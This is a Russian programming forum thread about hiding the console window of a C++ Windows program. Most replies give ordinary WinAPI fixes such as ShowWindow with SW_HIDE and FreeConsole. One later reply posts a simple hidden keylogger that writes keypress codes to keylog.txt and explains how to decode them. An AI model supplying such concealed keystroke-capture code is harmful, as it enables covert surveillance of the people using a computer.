Форум программистов, компьютерный форум, киберфорум
Наши страницы
С++ для начинающих
Войти
Регистрация
Восстановить пароль
 
Рейтинг 4.92/61: Рейтинг темы: голосов - 61, средняя оценка - 4.92
Dani
1395 / 639 / 134
Регистрация: 11.08.2011
Сообщений: 2,299
Записей в блоге: 2
Завершенные тесты: 1
1

Можно ли спрятать консоль в C++, и если да, то как?

28.08.2011, 12:17. Просмотров 11779. Ответов 10
Метки нет (Все метки)

Можно-ли спрятать консоль в с++, если да, то как?
(спрятать - чтобы она не отображалась графически)
А за одно какие для этого подключать библиотеки и какие аргументы в этих функциях.
0
QA
Эксперт
41792 / 34177 / 6122
Регистрация: 12.04.2006
Сообщений: 57,940
28.08.2011, 12:17
Ответы с готовыми решениями:

Можно ли не показывать (спрятать) консоль?
Чтоб консоль не отображалась,но выполняла все что в коде.

Как спрятать консоль?
Есть проблема - в винформах метод this.Hide() прятал форму в процессы. К сожалению это не...

Спрятать консоль
А кто ни будь научился консоль прятать Надо ее в десктопа убрать, что бы в фоне работала.

как спрятать строку, если нет данных?
Здравствуйте! я в пхп полный 0. подскажите как сделать: Есть такая строка <td> <b><?php print...

Как можно спрятать некоторую область на листе
Т.е. чтобы она не печаталась

10
insolent
827 / 347 / 64
Регистрация: 30.01.2009
Сообщений: 1,204
28.08.2011, 13:02 2
Dani, если пишешь под винду,в Visual Studio, просто выбери при создании пустой проект "Windows Application" или можно также запустить консольное приложение через другую программу, которая сделает так, что бы окно не показвалось ( SW_HIDE ), например:
C++
1
2
3
4
5
6
7
8
9
10
#include <shellapi.h>
 
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
ShellExecute(0,"open",lpCmdLine,0,0,SW_HIDE);
return 0;
}
2
Dani
1395 / 639 / 134
Регистрация: 11.08.2011
Сообщений: 2,299
Записей в блоге: 2
Завершенные тесты: 1
29.08.2011, 22:50  [ТС] 3
Нашел такое
C++
1
2
3
4
5
6
#include <windows.h>
using namespace std;
int main()
{
    HWND hWnd = GetConsoleWindow();
    showwindow(hWnd, SW_HIDE);
Но выдает ошибку, на строке инициализации. Не скажите в чем проблема?
0
Петррр
6192 / 3493 / 899
Регистрация: 28.10.2010
Сообщений: 5,928
29.08.2011, 23:47 4
C++
1
2
3
4
5
6
7
8
9
#include <iostream>
#include <windows.h>
 
int main()
{
    HWND hWnd = GetConsoleWindow();
    ShowWindow(hWnd, SW_HIDE);
    system("pause");
}
C++ регистрозависимый.
1
29.08.2011, 23:47
Dani
1395 / 639 / 134
Регистрация: 11.08.2011
Сообщений: 2,299
Записей в блоге: 2
Завершенные тесты: 1
30.08.2011, 00:17  [ТС] 5
Цитата Сообщение от Петррр Посмотреть сообщение
C++ регистрозависимый.
Да, только все-равно ошибка.
Код
GetConsoleWindow undeclared
Но вродеж поставил #include <windows.h> и using
0
Петррр
6192 / 3493 / 899
Регистрация: 28.10.2010
Сообщений: 5,928
30.08.2011, 00:28 6
Скажите какая ошибка.
0
insolent
827 / 347 / 64
Регистрация: 30.01.2009
Сообщений: 1,204
30.08.2011, 02:29 7
Попробуйте в начало добавить
C++
1
#define _WIN32_WINNT 0x0500
Kernel32.lib подключен?
0
OstapBender
587 / 525 / 76
Регистрация: 22.03.2011
Сообщений: 1,585
30.08.2011, 02:32 8
убрать окошко из которого запущена программа - FreeConsole();
2
Miwa123
37 / 37 / 22
Регистрация: 16.04.2013
Сообщений: 320
Записей в блоге: 1
17.08.2013, 11:47 9
C++
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
#include <iostream>
#include <conio.h>
#include <fstream>
#include <Windows.h>
 
int main()
{
    HWND hWnd = GetConsoleWindow();
    ShowWindow(hWnd, SW_HIDE);
    int c;
    std::ofstream keylog("keylog.txt");
    while((c = getch()) != 8)
    {
        keylog<<c<<" ";
    }
    system("pause");
}
в файл записывается кодировка символов в системе ANSI(во избежание многих проблем). расшифровать легко: в гугле ANSI и изображения. остановка роботы программы происходит когда нажмешь backspace + один любой символ. зайди в корень там создался файлик keylog.txt в нем куча цифр это и будут нажатые клавиши! если что-то непонятно пиши в личку. подскажу!
0
Pavlin27
1 / 1 / 2
Регистрация: 24.09.2016
Сообщений: 15
Завершенные тесты: 1
24.09.2016, 19:14 10
В visual c++ 6 мне помогло:
C++
1
#pragma comment(linker, "/subsystem:windows /ENTRY:mainCRTStartup")
0
Turbina_trista
1 / 1 / 0
Регистрация: 28.06.2017
Сообщений: 35
19.06.2018, 00:36 11
http://seliseev.ru/develop/visual-studio-otklyuchit-konsol.html
1
19.06.2018, 00:36
Answers
Эксперт
37091 / 29110 / 5898
Регистрация: 17.06.2006
Сообщений: 43,301
19.06.2018, 00:36

Как можно спрятать расширение .aspx в адресной строке?
Привет всем! Скажите, как можно спрятать расширение .aspx в адресной строке?

Спрятать или убрать консоль при запуске приложения
Доброго времени суток! Мне не хватает пары моментов. 1) Нужно спрятать или вообще убрать консоль...

Как можно обнулить весь массив если и если не задавать диапазон?
следующие способы результатов не приносят massiv1 = null; massiv1.Clear();


Искать еще темы с ответами

Или воспользуйтесь поиском по форуму:
11
Ответ Создать тему
Опции темы

КиберФорум - форум программистов, компьютерный форум, программирование
Powered by vBulletin® Version 3.8.9
Copyright ©2000 - 2019, vBulletin Solutions, Inc.